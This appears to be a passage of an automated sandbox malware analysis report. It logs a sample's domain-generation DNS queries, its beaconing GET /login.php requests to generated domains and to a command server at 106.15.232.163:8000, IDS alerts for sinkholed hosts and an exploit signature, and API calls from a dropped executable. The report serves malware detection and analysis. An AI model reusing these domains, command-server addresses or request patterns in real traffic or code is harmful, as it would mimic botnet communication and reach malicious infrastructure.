Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: qegyhig.com
Source: C:\Windows\apppatch\svchost.exeHTTP traffic: GET /login.php HTTP/1.1 Referer: http://www.google.com User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0) Host: gatyfus.com
Source: unknown DNS traffic detected: English language letter frequency does not match the domain names
Source: unknownDNS traffic detected: query: qexysig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzypug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyjux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebylov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofydac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupytyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupydig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyriq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyxyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufybyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volydot.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyvah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyxil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufymyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purywop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrygyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonymuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofyqit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyxyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyret.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyvuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galypyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyfyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyxuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumywaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyhuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqysag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volykit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonycum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyxul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykeh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowybof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyneh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxymed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryfyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujybig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyvoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyhup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyhis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyrol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysymux.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadypuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyvob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyheq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryxij.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocycuc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyzef.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyfaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyfel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahykih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqykab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyzuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvymul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyveg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofykoc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopycom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacykub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojygok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowykaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowymyk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyvin.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyrap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonydik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymik.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvyjop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyvuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyzuk.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyqih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegytyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojykom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopykak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxylor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofygaf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymylyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedynaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatydaw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygywor.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysywon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyquw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyvud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysysod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyrab.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegysoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegynap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufygug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysyfyj.com replaycode: Server failure (2)
Source: unknownDNS traffic detected: query: puvyliv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyvyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyfop.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purydip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyveb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofybyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purycul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyqok.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyjim.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volypum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymox.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyhiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacypyz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupypiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purytyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyxov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganydiw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryvex.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjoq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykyvod.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufyjuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonypyf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyzoh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqykog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowydic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyrom.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyqow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopyjuf.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyjig.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetylyv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volymum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumybal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyzek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumymuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrytun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymymud.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyquq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganycuh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyvas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexyqog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopybyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvylyn.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyhob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebysul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacydib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocymut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyzys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyduz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupygel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebytiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupymyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatynes.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: volyqat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzyjyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyqaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupycuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvywed.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahycib.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyzyh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexylup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojymic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumypog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonyryc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzybep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyzas.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyhyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowyjut.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykynon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyhyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lysytyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyfar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufypiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyrev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacynuz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykytej.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowycac.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purypol.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjun.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganykaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyrak.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryjir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvytuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocyjic.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqyqiv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyvis.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujypup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegykiq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykygur.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyduh.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyhuq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganypih.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyrag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowypit.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyqub.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyryw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyqyl.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyryled.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqynyw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puryjil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyjaj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupywog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqyfah.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyhev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocydof.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonygec.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetytav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: purygeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacyqys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytal.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekysip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykymyr.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebynyg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojyjyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujygul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puzytap.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gadyfob.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qeqytup.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufywil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatycyb.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqycos.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxyxyd.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vowygem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gaqypew.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekyhil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahyfow.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegylep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qetyvep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gahynaz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexykaq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyfir.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gacycus.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumycug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyxyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyriz.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galycuw.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vofymem.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyrymuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyfav.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyxywer.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvyxyj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lykysix.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojycif.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qegyxug.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyjon.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vocypyt.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qebyqil.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvygyq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvydov.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pumyliq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujyteq.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lymyfoj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopydum.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: galyros.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lyvytuj.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qekykev.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujymel.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyfog.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: puvybeg.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pupyjuv.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedyxip.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pujydag.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vonybat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qedysyp.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopymyc.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vopygat.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: ganyrys.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: vojybek.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: lygyvar.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: qexytep.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: pufydul.com replaycode: Name error (3)
Source: unknownDNS traffic detected: query: gatyviw.com replaycode: Name error (3)
Source: unknown Network traffic detected: HTTP traffic on port 64057 -> 8000
Source: unknown Network traffic detected: HTTP traffic on port 8000 -> 64057
Source: unknown Network traffic detected: DNS query count 1000
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe Code function: 22_2_012F4F80 IsNetworkAlive,#680,DnsFlushResolverCache,CreateThread,memset,lstrcpynA,lstrcpynA,StrNCatA,StrNCatA,InternetCheckConnectionA,InternetCheckConnectionA,memset,lstrcpynA,StrNCatA,InternetCheckConnectionA,22_2_012F4F80
Source: global traffic TCP traffic: 192.168.2.10:64057 -> 106.15.232.163:8000
Source: global traffic DNS traffic detected: number of DNS queries: 1000
Source: Joe Sandbox View IP Address: 3.94.10.34
Source: Joe Sandbox View ASN Name: CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 18.208.156.248:80 -> 192.168.2.10:49723
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 18.208.156.248:80 -> 192.168.2.10:49723
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.94.10.34:80 -> 192.168.2.10:49725
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.94.10.34:80 -> 192.168.2.10:49725
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 44.221.84.105:80 -> 192.168.2.10:49736
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 44.221.84.105:80 -> 192.168.2.10:49736
Source: Network traffic Suricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 52.34.198.229:80 -> 192.168.2.10:57974
Source: Network traffic Suricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 52.34.198.229:80 -> 192.168.2.10:57974
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.10:49807
Source: Network traffic Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.10:64065
Source: global traffic HTTP traffic detected:
    GET /login.php HTTP/1.1
    Referer: http://www.google.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Host: puzylyp.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /dh/147287063_498544.html HTTP/1.1
    Referer: http://www.google.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Host: 106.15.232.163:8000
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /login.php?subid1=20241112-0425-1788-b22b-1a13d8aaa54b HTTP/1.1
    Referer: http://www.google.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Host: ww25.lyxynyx.com
    Connection: Keep-Alive
    Cookie: __tad=1731345917.6190825
Source: global traffic HTTP traffic detected:
    GET /login.php?sub1=20241112-0425-1706-a2c8-02526792f211 HTTP/1.1
    Referer: http://www.google.com
    User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
    Host: ww16.vofycot.com
    Connection: Keep-Alive
    Cookie: __tad=1731345917.8924867
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: vojyqem.comCookie: parking_session=56c592c3-0730-4a19-aac9-be9b7f376588
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: puzylyp.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: lyvyxor.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gahyqah.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gadyniw.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: qegyhig.com
Source: global trafficHTTP traffic detected: GET /login.php HTTP/1.1Referer: http://www.google.comUser-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)Host: gatyfus.com
Source: unknown
TCP traffic detected without corresponding DNS query: 106.15.232.163
Source: unknown
UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\HjbEayjpwDCMPjOSZNSVkmZdBkkuCnBUbwKAncXvaKrJGoXhN\swvGCAxOMikYQeoQzimiprVu.exe
Code function: 22_2_012F9970 GetProcessHeap,HeapFree,recv,recv,send,recv,22_2_012F9970
Source: global traffic
HTTP traffic detected: GET /dh/147287063_498544.html HTTP/1.1
Referer: http://www.google.com
